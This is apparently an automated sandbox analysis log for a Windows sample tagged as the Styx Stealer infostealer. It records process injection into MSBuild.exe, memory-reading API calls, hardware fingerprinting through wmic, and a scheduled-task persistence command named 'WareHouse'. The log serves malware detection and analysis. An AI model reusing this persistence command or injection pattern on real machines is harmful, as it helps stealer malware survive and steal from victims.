                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261B72C NtWow64QueryInformationProcess64,3_2_0261B72C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261B738 NtWow64ReadVirtualMemory64,3_2_0261B738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261D0A8 NtWow64ReadVirtualMemory64,3_2_0261D0A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261CD99 NtWow64QueryInformationProcess64,3_2_0261CD99
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128C560 NtWow64QueryInformationProcess64,11_2_0128C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128C750 NtWow64ReadVirtualMemory64,11_2_0128C750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128C55A NtWow64QueryInformationProcess64,11_2_0128C55A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128C748 NtWow64ReadVirtualMemory64,11_2_0128C748
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261B2B83_2_0261B2B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_026196623_2_02619662
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261BE803_2_0261BE80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02618FF93_2_02618FF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_026133203_2_02613320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261DBD03_2_0261DBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_026120433_2_02612043
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E570D83_2_04E570D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E5206A3_2_04E5206A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E562A83_2_04E562A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E55BA03_2_04E55BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E684A03_2_04E684A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E6B4703_2_04E6B470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E6A6103_2_04E6A610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E657583_2_04E65758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E660E03_2_04E660E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E620983_2_04E62098
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E632503_2_04E63250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E62C083_2_04E62C08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E6CDD83_2_04E6CDD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E65D683_2_04E65D68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E618183_2_04E61818
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E609A03_2_04E609A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E679883_2_04E67988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E6AA603_2_04E6AA60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E63A483_2_04E63A48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E66A503_2_04E66A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E64A583_2_04E64A58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E645D83_2_04E645D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E645A03_2_04E645A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E620883_2_04E62088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E691D83_2_04E691D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E609913_2_04E60991
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E679783_2_04E67978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E66A403_2_04E66A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E63A393_2_04E63A39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_04E62BF93_2_04E62BF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B3E1603_2_05B3E160
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B3B4983_2_05B3B498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B3EAE83_2_05B3EAE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B3A0D03_2_05B3A0D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B394303_2_05B39430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B358673_2_05B35867
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B37AB03_2_05B37AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B874283_2_05B87428
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B860203_2_05B86020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B872B03_2_05B872B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B89AF83_2_05B89AF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B8BA183_2_05B8BA18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B845943_2_05B84594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B8CD323_2_05B8CD32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B8CD403_2_05B8CD40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B898D83_2_05B898D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B8CCDB3_2_05B8CCDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B860103_2_05B86010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B800403_2_05B80040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B8BF703_2_05B8BF70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B8BF613_2_05B8BF61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B89AE83_2_05B89AE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B852383_2_05B85238
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05B8A4D03_2_05B8A4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128E96811_2_0128E968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128204311_2_01282043
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128B2C111_2_0128B2C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_012897E011_2_012897E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_01288FF911_2_01288FF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128CE0F11_2_0128CE0F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128E96011_2_0128E960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128332E11_2_0128332E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05DE5C9011_2_05DE5C90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05DEEB0811_2_05DEEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05DE7AC011_2_05DE7AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05DEA05311_2_05DEA053
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05DE138D11_2_05DE138D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E1477011_2_05E14770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E16C2011_2_05E16C20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E10BC811_2_05E10BC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E12BA811_2_05E12BA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E12BB811_2_05E12BB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E177A011_2_05E177A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E1779011_2_05E17790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E1104011_2_05E11040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E1103011_2_05E11030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E138D011_2_05E138D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E13B0011_2_05E13B00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E13AF011_2_05E13AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E5141011_2_05E51410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E5798811_2_05E57988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E53AA011_2_05E53AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E55A9011_2_05E55A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E549C811_2_05E549C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E5004011_2_05E50040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0665C22811_2_0665C228
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0665AF7811_2_0665AF78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0665B5B111_2_0665B5B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0665158811_2_06651588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_06651AE011_2_06651AE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_06651ADA11_2_06651ADA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_06652AA811_2_06652AA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0665B28911_2_0665B289
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_06652A9811_2_06652A98
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1406837026.000000001B580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs Mu7iyblZk8.exe
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404731900.0000000002CA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs Mu7iyblZk8.exe
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404731900.0000000002C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStyxStealer.exe8 vs Mu7iyblZk8.exe
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStyxStealer.exe8 vs Mu7iyblZk8.exe
                  Source: classification engineClassification label: mal100.spyw.evad.winEXE@19/10@2/3
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Victim_SID[1].bdJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                  Source: Mu7iyblZk8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Mu7iyblZk8.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Mu7iyblZk8.exeVirustotal: Detection: 24%
                  Source: Mu7iyblZk8.exeReversingLabs: Detection: 36%
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeFile read: C:\Users\user\Desktop\Mu7iyblZk8.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Mu7iyblZk8.exe "C:\Users\user\Desktop\Mu7iyblZk8.exe"
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\WareHouse.exe C:\Users\user\AppData\Roaming\WareHouse.exe
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /fJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUIDJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
